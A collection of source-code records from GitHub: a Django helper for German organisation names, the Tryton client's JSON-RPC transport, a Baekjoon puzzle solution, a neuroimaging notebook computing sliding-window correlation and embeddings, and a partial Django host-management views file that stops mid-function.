+{"seq_id":"14797053998","text":"from django.utils.translation import gettext as _\n\nfrom juntagrico.config import Config\n\n\"\"\"\n c means case\n\"\"\"\n\n\ndef enriched_organisation(c):\n g = Config.organisation_name_config()['gender'].upper()\n if (c == 'N' and g == 'M') or ((c == 'G' or c == 'D') and g == 'F'):\n article = _('der')\n elif c == 'G' and (g == 'M' or g == 'N'):\n article = _('des')\n elif c == 'D' and (g == 'M' or g == 'N'):\n article = _('dem')\n elif c == 'A' and g == 'M':\n article = _('den')\n elif (c == 'N' or c == 'A') and g == 'F':\n article = _('die')\n elif (c == 'N' or c == 'A') and g == 'N':\n article = _('des')\n else:\n article = ''\n\n name = article + ' ' + \\\n Config.organisation_name_config(\n )['type'] + ' ' + Config.organisation_name()\n\n return name.strip()\n","repo_name":"juntagrico/juntagrico","sub_path":"juntagrico/util/organisation_name.py","file_name":"organisation_name.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"61"}
+{"seq_id":"8612273372","text":"import base64\nimport datetime\nimport errno\nimport hashlib\nimport http.client\nimport json\nimport logging\nimport socket\nimport ssl\nimport threading\nimport xmlrpc.client\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom decimal import Decimal\nfrom functools import partial, reduce\nfrom urllib.parse import quote, urljoin\n\n__all__ = [\"ResponseError\", \"Fault\", \"ProtocolError\", \"Transport\",\n \"ServerProxy\", \"ServerPool\"]\nCONNECT_TIMEOUT = 5\nDEFAULT_TIMEOUT = None\nlogger = logging.getLogger(__name__)\n\n\ndef deepcopy(obj):\n \"\"\"Recursively copy python mutable datastructures\"\"\"\n if isinstance(obj, (list, tuple)):\n return [deepcopy(o) for o in obj]\n elif isinstance(obj, dict):\n return {k: deepcopy(v) for k, v in obj.items()}\n else:\n return obj\n\n\nclass ResponseError(xmlrpc.client.ResponseError):\n pass\n\n\nclass Fault(xmlrpc.client.Fault):\n\n def __init__(self, faultCode, faultString='', **extra):\n super(Fault, self).__init__(faultCode, faultString, **extra)\n self.args = faultString\n\n def __str__(self):\n return str(self.faultCode)\n\n\nclass ProtocolError(xmlrpc.client.ProtocolError):\n pass\n\n\ndef object_hook(dct):\n if '__class__' in dct:\n if dct['__class__'] == 'datetime':\n return datetime.datetime(dct['year'], dct['month'], dct['day'],\n dct['hour'], dct['minute'], dct['second'], dct['microsecond'])\n elif dct['__class__'] == 'date':\n return datetime.date(dct['year'], dct['month'], dct['day'])\n elif dct['__class__'] == 'time':\n return datetime.time(dct['hour'], dct['minute'], dct['second'],\n dct['microsecond'])\n elif dct['__class__'] == 'timedelta':\n return datetime.timedelta(seconds=dct['seconds'])\n elif dct['__class__'] == 'bytes':\n return base64.decodebytes(dct['base64'].encode('utf-8'))\n elif dct['__class__'] == 'Decimal':\n return Decimal(dct['decimal'])\n return dct\n\n\nclass JSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, datetime.date):\n if isinstance(obj, datetime.datetime):\n return {'__class__': 'datetime',\n 'year': obj.year,\n 'month': obj.month,\n 'day': obj.day,\n 'hour': obj.hour,\n 'minute': obj.minute,\n 'second': obj.second,\n 'microsecond': obj.microsecond,\n }\n return {'__class__': 'date',\n 'year': obj.year,\n 'month': obj.month,\n 'day': obj.day,\n }\n elif isinstance(obj, datetime.time):\n return {'__class__': 'time',\n 'hour': obj.hour,\n 'minute': obj.minute,\n 'second': obj.second,\n 'microsecond': obj.microsecond,\n }\n elif isinstance(obj, datetime.timedelta):\n return {'__class__': 'timedelta',\n 'seconds': obj.total_seconds(),\n }\n elif isinstance(obj, bytes):\n return {'__class__': 'bytes',\n 'base64': base64.encodebytes(obj).decode('utf-8'),\n }\n elif isinstance(obj, Decimal):\n return {'__class__': 'Decimal',\n 'decimal': str(obj),\n }\n return super(JSONEncoder, self).default(obj)\n\n\nclass JSONParser(object):\n\n def __init__(self, target):\n self.__targer = target\n\n def feed(self, data):\n self.__targer.feed(data)\n\n def close(self):\n pass\n\n\nclass JSONUnmarshaller(object):\n def __init__(self):\n self.data = []\n\n def feed(self, data):\n self.data.append(data.decode('utf-8'))\n\n def close(self):\n return json.loads(''.join(self.data), object_hook=object_hook)\n\n\nclass Transport(xmlrpc.client.SafeTransport):\n\n accept_gzip_encoding = True\n encode_threshold = 1400 # common MTU\n\n def __init__(\n self, fingerprints=None, ca_certs=None, session=None):\n xmlrpc.client.Transport.__init__(self)\n self._connection = (None, None)\n self.__fingerprints = fingerprints\n self.__ca_certs = ca_certs\n self.session = session\n\n def getparser(self):\n target = JSONUnmarshaller()\n parser = JSONParser(target)\n return parser, target\n\n def parse_response(self, response):\n cache = None\n if hasattr(response, 'getheader'):\n cache = int(response.getheader('X-Tryton-Cache', 0))\n response = super().parse_response(response)\n if cache:\n try:\n response['cache'] = int(cache)\n except ValueError:\n pass\n return response\n\n def get_host_info(self, host):\n host, extra_headers, x509 = xmlrpc.client.Transport.get_host_info(\n self, host)\n if extra_headers is None:\n extra_headers = []\n if self.session:\n auth = base64.encodebytes(\n self.session.encode('utf-8')).decode('ascii')\n auth = ''.join(auth.split()) # get rid of whitespace\n extra_headers.append(\n ('Authorization', 'Session ' + auth),\n )\n extra_headers.append(('Connection', 'keep-alive'))\n return host, extra_headers, x509\n\n def send_headers(self, connection, headers):\n for key, val in headers:\n if key == 'Content-Type':\n val = 'application/json'\n connection.putheader(key, val)\n\n def make_connection(self, host):\n if self._connection and host == self._connection[0]:\n return self._connection[1]\n chost, self._extra_headers, x509 = self.get_host_info(host)\n\n ssl_ctx = ssl.create_default_context(cafile=self.__ca_certs)\n\n def http_connection():\n self._connection = host, http.client.HTTPConnection(chost,\n timeout=CONNECT_TIMEOUT)\n self._connection[1].connect()\n sock = self._connection[1].sock\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n\n def https_connection(allow_http=False):\n self._connection = host, http.client.HTTPSConnection(chost,\n timeout=CONNECT_TIMEOUT, context=ssl_ctx)\n try:\n self._connection[1].connect()\n sock = self._connection[1].sock\n sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)\n try:\n peercert = sock.getpeercert(True)\n except socket.error:\n peercert = None\n\n def format_hash(value):\n return reduce(lambda x, y: x + y[1].upper()\n + ((y[0] % 2 and y[0] + 1 < len(value)) and ':' or ''),\n enumerate(value), '')\n return format_hash(hashlib.sha1(peercert).hexdigest())\n except (socket.error, ssl.SSLError, ssl.CertificateError):\n if allow_http:\n http_connection()\n else:\n raise\n\n fingerprint = ''\n if (self.__fingerprints is not None\n and self.__fingerprints.exists(chost)):\n if self.__fingerprints.get(chost):\n fingerprint = https_connection()\n else:\n http_connection()\n else:\n fingerprint = https_connection(allow_http=True)\n\n if self.__fingerprints is not None:\n self.__fingerprints.set(chost, fingerprint)\n self._connection[1].timeout = DEFAULT_TIMEOUT\n self._connection[1].sock.settimeout(DEFAULT_TIMEOUT)\n return self._connection[1]\n\n\nclass ServerProxy(xmlrpc.client.ServerProxy):\n __id = 0\n\n def __init__(self, host, port, database='', verbose=0,\n fingerprints=None, ca_certs=None, session=None, cache=None):\n self.__host = '%s:%s' % (host, port)\n if database:\n database = quote(database)\n self.__handler = '/%s/' % database\n else:\n self.__handler = '/'\n self.__transport = Transport(fingerprints, ca_certs, session)\n self.__verbose = verbose\n self.__cache = cache\n\n def __request(self, methodname, params):\n dumper = partial(json.dumps, cls=JSONEncoder, separators=(',', ':'))\n self.__id += 1\n id_ = self.__id\n if self.__cache and self.__cache.cached(methodname):\n try:\n return self.__cache.get(methodname, dumper(params))\n except KeyError:\n pass\n request = dumper({\n 'id': id_,\n 'method': methodname,\n 'params': params,\n }).encode('utf-8')\n\n try:\n try:\n response = self.__transport.request(\n self.__host,\n self.__handler,\n request,\n verbose=self.__verbose\n )\n except (socket.error, http.client.HTTPException) as v:\n if (isinstance(v, socket.error)\n and v.args[0] == errno.EPIPE):\n raise\n # try one more time\n self.__transport.close()\n response = self.__transport.request(\n self.__host,\n self.__handler,\n request,\n verbose=self.__verbose\n )\n except xmlrpc.client.ProtocolError as e:\n raise Fault(str(e.errcode), e.errmsg)\n except Exception:\n self.__transport.close()\n raise\n if response['id'] != id_:\n raise ResponseError('Invalid response id (%s) excpected %s' %\n (response['id'], id_))\n if response.get('error'):\n raise Fault(*response['error'])\n if self.__cache and response.get('cache'):\n self.__cache.set(\n methodname, dumper(params), response['cache'],\n response['result'])\n return response['result']\n\n def close(self):\n self.__transport.close()\n\n @property\n def ssl(self):\n return isinstance(self.__transport.make_connection(self.__host),\n http.client.HTTPSConnection)\n\n @property\n def url(self):\n scheme = 'https' if self.ssl else 'http'\n return urljoin(scheme + '://' + self.__host, self.__handler)\n\n\nclass ServerPool(object):\n keep_max = 4\n _cache = None\n\n def __init__(self, host, port, database, *args, **kwargs):\n if kwargs.get('cache'):\n self._cache = kwargs['cache'] = _Cache()\n self.ServerProxy = partial(\n ServerProxy, host, port, database, *args, **kwargs)\n\n self._host = host\n self._port = port\n self._database = database\n\n self._lock = threading.Lock()\n self._pool = []\n self._used = {}\n self.session = kwargs.get('session')\n\n def getconn(self):\n with self._lock:\n if self._pool:\n conn = self._pool.pop()\n else:\n conn = self.ServerProxy()\n self._used[id(conn)] = conn\n return conn\n\n def putconn(self, conn):\n with self._lock:\n self._pool.append(conn)\n del self._used[id(conn)]\n\n # Remove oldest connections\n while len(self._pool) > self.keep_max:\n conn = self._pool.pop()\n conn.close()\n\n def close(self):\n with self._lock:\n for conn in self._pool + list(self._used.values()):\n conn.close()\n self._pool = []\n self._used.clear()\n\n @property\n def ssl(self):\n for conn in self._pool + list(self._used.values()):\n return conn.ssl\n return None\n\n @property\n def url(self):\n for conn in self._pool + list(self._used.values()):\n return conn.url\n\n @contextmanager\n def __call__(self):\n conn = self.getconn()\n yield conn\n self.putconn(conn)\n\n def clear_cache(self, prefix=None):\n if self._cache:\n self._cache.clear(prefix)\n\n\nclass _Cache:\n\n def __init__(self):\n self.store = defaultdict(dict)\n\n def cached(self, prefix):\n return prefix in self.store\n\n def set(self, prefix, key, expire, value):\n if isinstance(expire, (int, float)):\n expire = datetime.timedelta(seconds=expire)\n if isinstance(expire, datetime.timedelta):\n expire = datetime.datetime.now() + expire\n self.store[prefix][key] = (expire, deepcopy(value))\n\n def get(self, prefix, key):\n now = datetime.datetime.now()\n try:\n expire, value = self.store[prefix][key]\n except ValueError:\n raise KeyError\n if expire < now:\n self.store.pop(key)\n raise KeyError\n logger.info('(cached) %s %s', prefix, key)\n return deepcopy(value)\n\n def clear(self, prefix=None):\n if prefix:\n self.store[prefix].clear()\n else:\n self.store.clear()\n","repo_name":"tryton/tryton-client","sub_path":"tryton/jsonrpc.py","file_name":"jsonrpc.py","file_ext":"py","file_size_in_byte":13468,"program_lang":"python","lang":"en","doc_type":"code","stars":178,"dataset":"github-code","pt":"61"}
+{"seq_id":"200802088","text":"import sys\n\ndef get_key(k):\n\tfor key, value in nlst.items():\n\t\tif k == value:\n\t\t\treturn int(key) + 1\n\ninput = sys.stdin.readline\nn, m = map(int, input().split())\nnlst = {i : input().rstrip(\"\\n\") for i in range(n)}\nrev_nlst = dict(map(reversed, nlst.items()))\nmlst = [input().rstrip(\"\\n\") for _ in range(m)]\nfor i in mlst:\n\tif i.isdigit() == True:\n\t\tprint(nlst[int(i) - 1])\n\telse:\n\t\tprint(rev_nlst[i] + 1)","repo_name":"Zerotay/Baekjoon","sub_path":"step_by_step/step_13/1620.py","file_name":"1620.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7019403202","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.9.1\n# kernelspec:\n# display_name: python/3.8\n# language: python\n# name: py3.8\n# ---\n\n# # Description: SWC + Embeddings\n#\n# This notebook performs the following analysis steps:\n#\n# 1) Load ROI representative time series (those must already exists in text file format)\n#\n# 2) Plots static FC matrix, as well as a carpet plot\n#\n# 3) Dimensionality Reduction from ROI to PCA components (whole time-series)\n#\n# 4) Compute Sliding Window Correlation based on PCA representative time series\n#\n# 5) Generate 3D Laplacian Embeddings\n\n# %%time\nimport pickle\nimport os.path as osp\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom nilearn.plotting import plot_matrix\nfrom scipy.signal import tukey, hamming\nfrom sklearn.manifold import SpectralEmbedding\nfrom sklearn.neighbors import kneighbors_graph\nfrom scipy.spatial.distance import correlation as dis_corr\nfrom utils.base import plot_fc_matrix, compute_swc, reduce_dimensionality_pca\nimport hvplot.pandas\nimport hvplot.xarray\nimport holoviews as hv\nimport panel as pn\nfrom holoviews import dim, opts\nhv.extension('bokeh')\npn.extension()\n\nseed = np.random.RandomState(seed=3)\n\nPRJDIR='/data/SFIM_Vigilance/PRJ_Vigilance_Smk01/'\nsubjects = ['sub-521', 'sub-551', 'sub-552', 'sub-632', 'sub-634','sub-664', 'sub-680', 'sub-681', 'sub-682', 'sub-686',\n 'sub-694', 'sub-699', 'sub-700', 'sub-704', 'sub-706','sub-713', 'sub-714', 'sub-720', 'sub-721', 'sub-739',\n 'sub-750', 'sub-751', 'sub-766', 'sub-789']\n\n# +\nSBJ = subjects[17]\natlas_name = 'Craddock_T2Level_0200'\nTR = 2.0\nWL_sec = 30\nWS_trs = 1\nWL_trs = int(WL_sec / TR)\ndim_red_method = 'PCA'\ndim_red_method_percent = 85\nle_num_dims = 3\nle_k_NN = 100\n\npath_ts = osp.join(PRJDIR,'PrcsData',SBJ,'D02_Preproc_fMRI','errts.'+SBJ+'.Craddock_T2Level_0200.wl'+str(WL_sec).zfill(3)+'s.fanaticor_ts.1D')\npath_outdir = osp.join(PRJDIR,'PrcsData',SBJ,'D02_Preproc_fMRI')\nout_prefix = SBJ+'_fanaticor_'+atlas_name+'_wl'+str(WL_sec).zfill(3)+'s_ws'+str(WS_trs*TR).zfill(3)+'s'\nout_pca_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.pca_obj.pkl')\nout_pcats_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.pca_ts.pkl')\nout_swc_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.swcorr.pkl')\nout_lem_path = osp.join(path_outdir,out_prefix+'_'+dim_red_method+'_vk'+str(dim_red_method_percent)+'.le'+str(le_num_dims)+'d_knn'+str(le_k_NN).zfill(3)+'.pkl')\n\nprint('++ INFO: Selection Parameters: ')\nprint(' + Subject : %s' % SBJ)\nprint(' + Atlas : %s' % atlas_name)\nprint(' + SWC : wl=%ss, ws=%ss, dim_red=%s, extra-->%s' % (str(WL_sec),str(WS_trs*TR),dim_red_method,'vk='+str(dim_red_method_percent)+'%'))\nprint(' + Timeseries File : %s' % path_ts)\nprint(' + -----------------------------------------------------------')\nprint('++ INFO: Laplacian Embedding Settings: ')\nprint(' + Number of Dimensions: %d' % le_num_dims)\nprint(' + K-Nearest Neighbors : %d' % le_k_NN)\nprint(' + Distance Metric: correlation distance')\nprint('++ -----------------------------------------------------------')\nprint(' + INFO: Outputs:')\nprint(' + Output Folder : %s' % path_outdir)\nprint(' + PCA Object File : %s' % out_pca_path)\nprint(' + PCA Timeseries File : %s' % out_pcats_path)\nprint(' + SWC File : %s' % out_swc_path)\nprint(' + LE File : %s' % out_lem_path)\n# -\n\n# ***\n# ### 1. Load ROI Timeseries\n#\n# First, we load the time series for all representative ROIs, and show a static functional connectivity matrix and a carpet plot. This may help capture some issues with the data.\n\n# +\n# %%time\nts_df = pd.read_csv(path_ts, sep='\\t', header=None)\nNacq,Nrois = ts_df.shape\n# Generate ROI names\n# ------------------\n# Those are default names, but it would be useful to have a file per atlas that contains the names\n# and we load it here.\nroi_names = ['ROI'+str(r+1).zfill(3) for r in range(Nrois)]\n\n# Put timeseries also in Xarray form. This is necessary for plotting purposes via hvplot.Image\n# --------------------------------------------------------------------------------------------\nts_xr = xr.DataArray(ts_df.values,dims=['Time [TRs]','ROIs'])\n\n# Show a summary of the data being loaded.\n# ----------------------------------------\nprint('++ INFO: Time-series loaded into memory [N_acq=%d, N_rois=%d]' % (Nacq, Nrois))\nts_df.head()\n\n# +\n# %%time\n# Generate Plot of Static Functional connectivity matrix\n# ======================================================\nfc_matrix_plot = plot_fc_matrix(ts_df,roi_names,'single')\n\n# Generate Timeseries carpet plot\nts_carpet_plot = ts_xr.hvplot.image(cmap='gray', width=1500, colorbar=True, title='ROI Timeseries (carpet plot) - Subject: %s' % SBJ).opts(colorbar_position='bottom')\nts_roi_plot = ts_df[0].hvplot(cmap='gray',width=1500,height=100)\n# Show both plots side-by-side using panel\npn.Row(fc_matrix_plot, pn.Column(ts_carpet_plot,ts_roi_plot))\n# -\n\n# ***\n# ### 2. Dimensionality Reduction\n#\n# Here we reduce the dimensionality of the data via PCA. The goal is to have a smaller connectivity matrix, therefore we go from X number of ROIs to a Y number of PCA components, with Y hopefully being much smaller than X.\n#\n# * How many components are kept depends on the amount of variance we keep (default is 97.5%) \n\n# %%time\nts_pca_df, pca_plot, pca = reduce_dimensionality_pca(ts_df,dim_red_method_percent,sbj_id=SBJ)\npickle.dump(pca, open(out_pca_path, \"wb\" ) )\nts_pca_df.to_pickle(out_pcats_path)\n\npca_plot\n\n# ***\n# ### 4. Create SWC Matrix\n\n# %%time\n# Create a tukey (or tappered window) of the appropriate length\n# =============================================================\n#window = tukey(WL_trs,.2)\nwindow = np.ones((WL_trs,))\npd.DataFrame(window).hvplot(title='Sliding Window Shape',xlabel='Time [TRs]',ylabel='Amplitude')\n\n# %%time\n# Compute sliding window correlation\n# ==================================\nswc_r, swc_Z, winInfo = compute_swc(ts_pca_df,WL_trs,WS_trs,window=window)\nxr.DataArray(swc_Z.values.T,dims=['Time [Window ID]','PCA Connection']).hvplot.image(title='SWC Matrix - Fisher Z', cmap='RdBu').redim.range(value=(-1,1)).opts(width=1700)\n\n# ***\n# ### 4. Generate Laplacian Embedding\n\n# %%time\nse = SpectralEmbedding(n_components=le_num_dims, affinity='precomputed', n_jobs=32, random_state=seed)\nX_affinity = kneighbors_graph(swc_Z.T,le_k_NN,include_self=True,n_jobs=32, metric=dis_corr)\nX_affinity = 0.5 * (X_affinity + X_affinity.T)\nse_X = se.fit_transform(X_affinity.toarray())\nprint ('++ INFO: Embedding Dimensions: %s' % str(se_X.shape))\n\n# +\n# Put the embeddings into a dataframe (for saving and plotting)\n# =============================================================\nLE3D_df = pd.DataFrame(columns=['x','y','z','x_norm','y_norm','z_norm','color_int','color_rgb','label'])\nLE3D_df['x'] = se_X[:,0]\nLE3D_df['y'] = se_X[:,1]\nLE3D_df['z'] = se_X[:,2]\n# Note: there is a change in scale between scikit-learn 0.19 and 0.23 when it comes to the laplacian embeddings.\n# I checked a few examples and the structure is the same, but the scale is different. To be able to represent all cases\n# on the same scale (and given that the dimensions are meaningless), I create this normalized version of the low dimensional embedding\nLE3D_df[['x_norm','y_norm','z_norm']]= LE3D_df[['x','y','z']]/LE3D_df[['x','y','z']].max()\n# External-data based color\nLE3D_df['color_int'] = [(255,255,255) for i in range(winInfo['numWins'])]\nLE3D_df['color_rgb'] = ['#ffffff' for i in range(winInfo['numWins'])]\n# Time-based color\n\n# Window Names\nLE3D_df['label'] = winInfo['winNames']\nLE3D_df.head()\nLE3D_df.to_pickle(out_lem_path)\n# -\n\nhv.extension('plotly')\npn.extension('plotly')\n\nplayer = pn.widgets.Player(name='Player', start=0, end=winInfo['numWins'], value=1, loop_policy='loop', width=800, step=1)\n@pn.depends(player.param.value)\ndef plot_embed3d(max_win):\n output = hv.Scatter3D((LE3D_df['x_norm'][0:max_win],\n LE3D_df['y_norm'][0:max_win],\n LE3D_df['z_norm'][0:max_win])).opts(color=LE3D_df['color_rgb'][0:max_win],\n size=5, \n xlim=(-1,1), \n ylim=(-1,1), \n zlim=(-1,1), aspect={'x':1,'y':1,'z':1}, camera_zoom=1, margins=(5,5,5,5), height=800, width=800)\n return output\npn.Column(player,plot_embed3d)\n\n# ### Test with PNAS 2015 Results (for consistency)\n# ***\n\n# Load Pre-computed results in MATLAB from one task-based subject from NI2019 \nfrom scipy.io import loadmat\nDATAFILE = osp.join('/data/SFIMJGC_HCP7T/PRJ_CognitiveStateDetection02',\n 'PrcsData_PNAS2015','SBJ06'+'/D02_CTask001/'+'SBJ06'+'_CTask001_WL'+str(30).zfill(3)+'_WS01_NROI0200_dF.mat')\nDATAMAT = loadmat(DATAFILE)\npnas2015orig_ts_df = pd.DataFrame(DATAMAT['origTS'])\npnas2015orig_Nacq,pnas2015orig_Nrois = pnas2015orig_ts_df.shape\npnas2015orig_roi_names = ['ROI'+str(r+1).zfill(3) for r in range(pnas2015orig_Nrois)]\npnas2015orig_tr = DATAMAT['TR'][0][0]\npnas2015orig_ts_xr = xr.DataArray(pnas2015orig_ts_df.values,dims=['Time [TRs]','ROIs'])\nprint('++ Loaded this data: %s' % DATAFILE)\n\n# Generate Plot of Functional connectivity matrix\npnas2015orig_fc_matrix_plot = plot_fc_matrix(pnas2015orig_ts_df,pnas2015orig_roi_names,'single')\n# Generate Timeseries carpet plot\npnas2015orig_ts_carpet_plot = pnas2015orig_ts_xr.hvplot.image(cmap='gray', width=1500, colorbar=True, title='ROI Timeseries (carpet plot) - Subject: %s' % 'SBJ06').opts(colorbar_position='bottom')\npnas2015orig_ts_roi_plot = pnas2015orig_ts_df[0].hvplot(cmap='gray',width=1500,height=100)\n\n# +\npn.Row(pnas2015orig_fc_matrix_plot, pnas2015orig_ts_carpet_plot)\n\n# PCA Step\npnas2015python_ts_pca_df, pnas2015python_pca_plot, pnas2015python_pca = reduce_dimensionality_pca(pnas2015orig_ts_df,97.5,sbj_id='SBJ06', n_comp=None)\npnas2015orig_ts_pca_df = pd.DataFrame(DATAMAT['dimRedTS'])\nprint('++ INFO: PCA (as matlad did it) --> %d components' % pnas2015orig_ts_pca_df.shape[1])\nprint('++ INFO: PCA (as python does it) --> %d components' % pnas2015python_ts_pca_df.shape[1])\npnas2015python_pca_plot\n# -\n\npnas2015python_ts_pca_df['PC083'].hvplot(width=1700) * \\\npnas2015orig_ts_pca_df[83].hvplot().opts(line_dash='dashed')\n\n# Create a tukey (or tappered window) of the appropriate length\n# =============================================================\npnas2015orig_wl_trs = DATAMAT['WL'][0][0]\npnas2015orig_ws_trs = DATAMAT['WS'][0][0]\npnas2015python_window = np.ones((pnas2015orig_wl_trs,))\npnas2015orig_swc_Z = pd.DataFrame(DATAMAT['CB']['snapshots'][0][0].T)\npnas2015python_swc_r, pnas2015python_swc_Z, pnas2015python_winInfo = compute_swc(pnas2015python_ts_pca_df,pnas2015orig_wl_trs,pnas2015orig_ws_trs,window=pnas2015python_window)\n\nxr.DataArray(pnas2015orig_swc_Z.values.T - pnas2015python_swc_Z.values.T,dims=['Time [Window ID]','PCA Connection']).hvplot.image(title='SWC Matrix - Fisher Z', cmap='RdBu_r').redim.range(value=(-1,1)).opts(width=500)\n\nnCom = 3\nk_NN = 100\nseed = np.random.RandomState(seed=5)\n\nstart_time = time.time()\nX = DATAMAT['CB']['snapshots'][0][0]\n#X = pnas2015_swc_Z.T\npnas2015_se = SpectralEmbedding(n_components=nCom, affinity='precomputed', n_jobs=32, random_state=seed)\npnas2015_X_affinity = kneighbors_graph(X,k_NN,include_self=True,n_jobs=32, metric=dis_corr)\npnas2015_X_affinity = 0.5 * (pnas2015_X_affinity + pnas2015_X_affinity.T)\npnas2015_se_X = pnas2015_se.fit_transform(pnas2015_X_affinity.toarray())\nend_time = time.time()\nprint ('++ INFO: Elapset Time: '+ str(end_time - start_time))\nprint ('++ INFO: Embedding Dimensions: %s' % str(pnas2015_se_X.shape))\n\naux_color_int = DATAMAT['winInfo']['color'][0][0]\naux_color_rgb = [ '#%02x%02x%02x' % (int(aux_color_int[i,0]*255), \n int(aux_color_int[i,1]*255), \n int(aux_color_int[i,2]*255)) for i in np.arange(pnas2015python_winInfo['numWins'])]\naux_win_labels = DATAMAT['winInfo']['winNames'][0][0]\nembedding_df = pd.DataFrame(columns=['x','y','z','x_norm','y_norm','z_norm','color_int','color_rgb','label'])\nembedding_df['x'] = pnas2015_se_X[:,0]\nembedding_df['y'] = pnas2015_se_X[:,1]\nembedding_df['z'] = pnas2015_se_X[:,2]\nembedding_df[['x_norm','y_norm','z_norm']]= embedding_df[['x','y','z']]/embedding_df[['x','y','z']].max()\nembedding_df['color_int'] = tuple(aux_color_int)\nembedding_df['color_rgb'] = aux_color_rgb\nembedding_df['label'] = aux_win_labels\nembedding_df.head()\nembedding_df.to_pickle('./test_embed.pkl')\n\nhv.extension('plotly')\npn.extension('plotly')\n\nNwins = embedding_df.shape[0]\nplayer = pn.widgets.Player(name='Player', start=0, end=Nwins, value=1, loop_policy='loop', width=800, step=1)\n@pn.depends(player.param.value)\ndef plot_embed3d(max_win):\n output = hv.Scatter3D((embedding_df['x_norm'][0:max_win],\n embedding_df['y_norm'][0:max_win],\n embedding_df['z_norm'][0:max_win])).opts(color=embedding_df['color_rgb'][0:max_win],\n size=5, \n xlim=(-1,1), \n ylim=(-1,1), \n zlim=(-1,1), aspect={'x':1,'y':1,'z':1}, camera_zoom=1, margins=(5,5,5,5), height=800, width=800)\n return output\npn.Column(player,plot_embed3d)\n\n\n","repo_name":"javiergcas/PRJ_Vigilance_Smk01","sub_path":"Notebooks/N01_SWC.py","file_name":"N01_SWC.py","file_ext":"py","file_size_in_byte":13920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3482545472","text":"from django.shortcuts import render, HttpResponse,render_to_response,redirect\nfrom hostmanager import models\nimport json\nfrom django import forms\nfrom django.forms import widgets\nfrom django.forms import fields\nfrom django.forms import models as form_model\n\n# Create your views here.\n\n\nclass User(forms.Form):\n # 字段本身只能验证,内含插件生成html\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n max_length=20,\n error_messages={\n 'required': '用户名不能为空',\n 'min_length': '最小长度为6',\n }\n )\n pwd = fields.CharField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '密码不能为空',\n }\n )\n\n ugrup = fields.ChoiceField(\n initial=1,\n choices=models.User.type_choices,\n widget=widgets.Select(attrs={'class': 'form-control'})\n\n )\n # print(models.User.type_choices)\n # a = form_model.ModelChoiceField(queryset=models.User.objects.ugrup)\n\n\ndef lg(func): # 验证用户登录装饰器\n def wrap(request, *args, **kwargs):\n # 如果未登陆,跳转到指定页面\n if not request.session.get(\"name\"):\n # print(\"no login\")\n return redirect('/login')\n return func(request, *args, **kwargs)\n return wrap\n\n\n@lg\ndef index(request):\n # 首页\n uid = request.session.get(\"id\")\n name = request.session.get(\"name\")\n data = models.Host.objects.all()\n\n return render(request, \"index.html\", {\"host_list\": data, \"name\": name, })\n\n\nclass Host(forms.Form):\n id = fields.IntegerField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n required=True,\n )\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n error_messages={\n 'required': '用户名不能为空',\n }\n )\n ip = fields.GenericIPAddressField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': 'IP不能为空',\n }\n )\n port = fields.IntegerField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '端口不能为空',\n }\n )\n\n\ndef select_host(request):\n # 主机信息\n id = request.POST.get(\"id\")\n data = models.User.objects.filter(id=id).first()\n data_all = models.Host.objects.all()\n return HttpResponse({\"all\": data_all, \"my\": data})\n\n\ndef add_user(request):\n # 添加用户\n if request.method == \"GET\":\n obj = User()\n return render(request, \"adduser.html\", {\"obj\": obj})\n else:\n obj = User(request.POST)\n ret = obj.is_valid()\n if ret:\n models.User.objects.create(**obj.cleaned_data)\n return HttpResponse(\"ok\")\n else:\n return HttpResponse(\"err\")\n\n\nclass Permission(forms.Form):\n # print(models.User.objects.all().values_list(\"id\", \"name\"))\n user = fields.ChoiceField(\n initial=1,\n choices=models.User.objects.all().values_list(\"id\", \"name\"),\n widget=widgets.Select(attrs={'class': 'form-control', \"id\": \"u\"}),\n )\n s1 = fields.ChoiceField(\n widget=widgets.SelectMultiple(attrs={'class': 'form-control', \"id\": \"hosts\"}),\n )\n s2 = fields.ChoiceField(\n required=True,\n widget=widgets.SelectMultiple(attrs={'class': 'form-control', \"id\": \"all_hosts\"}),\n )\n\n def __init__(self, *args, **kwargs):\n super(Permission, self).__init__(*args, **kwargs)\n self.fields[\"user\"].choices = models.User.objects.all().values_list(\"id\", \"name\")\n\n\ndef permission(request):\n if request.method == \"GET\":\n obj = Permission()\n data1 = models.User.objects.all()\n return render(request, \"permission.html\", {\"user_list\": data1, \"obj\": obj})\n else:\n print(request.POST)\n a = {'user': [1], 's1': [1]}\n obj = Permission(a)\n ret = obj.is_valid()\n if ret:\n print('ok')\n else:\n print(obj.errors)\n\n\n\ndef host_group(request):\n return render(request, \"hostgroup.html\")\n\n\ndef get_hosts(request):\n if request.method == \"GET\":\n a_hosts = []\n a = int(request.GET.get(\"uid\"))\n # print(a, type(a))\n hosts = 